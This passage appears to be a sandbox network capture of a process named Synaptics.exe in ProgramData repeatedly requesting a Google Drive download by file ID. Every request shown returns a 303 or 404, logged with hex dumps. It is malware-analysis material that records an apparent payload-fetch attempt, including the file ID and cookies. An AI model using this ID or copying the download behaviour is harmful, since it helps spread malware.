                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-z2k6ZyLUOzT8Anu165UxfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    93192.168.2.452082142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:04 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:05 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4ZUzqQhteTDOn3DtVO3XS61my8wMcWSHlFGEc_Fyl3CRBrq0YeywCBa2j3E1BWYUg4
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:04 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-NLS6wCTfRLBf1OJla2rm3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:05 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:05 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 65 59 68 54 61 34 58 54 70 47 45 35 31 75 69 78 75 51 46 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="xeYhTa4XTpGE51uixuQFIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:05 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    94192.168.2.452088142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:05 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:05 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-8US0RV8qQPHq4lZWa-mKdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    95192.168.2.452090142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:05 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:05 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4DNhYLOqfTGW9Kacypbi9PPJXyMMVeAbTU7Qb97Nlox2W0BMIZ1vK8PGhQrBIlc9FT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:05 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-FCn_zLPgjEfZCbzA57NmDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:05 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:05 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 51 6c 67 77 38 6f 75 31 66 4e 74 33 36 44 71 70 66 39 5a 7a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="mQlgw8ou1fNt36Dqpf9ZzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:05 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    96192.168.2.452089142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:05 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:05 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-qOaxM2QVNhMKIq9e2rvy7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    97192.168.2.452095142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:05 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:06 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5rMlgzdJF1f9HVlW8qpu5btQIYV2VULl9EWNcD5CZoHP2ca-9PeyN0XFUIq8xw6DrW
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:05 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_dC7TnPJZG87Qc6QhYaipg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:06 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:06 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 74 76 44 48 42 53 78 69 77 64 53 43 34 38 75 72 76 79 49 50 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="UtvDHBSxiwdSC48urvyIPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:06 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    98192.168.2.452109142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:07 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:07 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-C5EjzUfH-Boh0XCv8mYBpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    99192.168.2.452108142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:07 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:07 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
